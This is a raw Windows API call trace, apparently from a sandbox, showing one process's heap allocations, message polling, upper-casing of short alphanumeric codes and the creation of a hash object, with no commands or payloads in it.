[0198.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.797] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0198.797] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.797] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.797] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.797] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.797] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.797] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.797] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.797] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.798] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.798] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.798] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.798] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.798] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.798] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.798] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.798] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0198.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0198.798] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0198.798] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.799] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0198.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.800] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.800] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.800] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.800] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.800] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.800] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.800] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0198.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.800] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.801] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.801] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.801] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.801] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.801] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.801] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.801] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.801] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.801] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.802] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.802] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.802] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.802] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.802] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.802] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.803] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.803] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.803] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.803] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.803] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.803] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.803] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.803] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.804] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.804] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.805] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.805] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.805] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.806] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 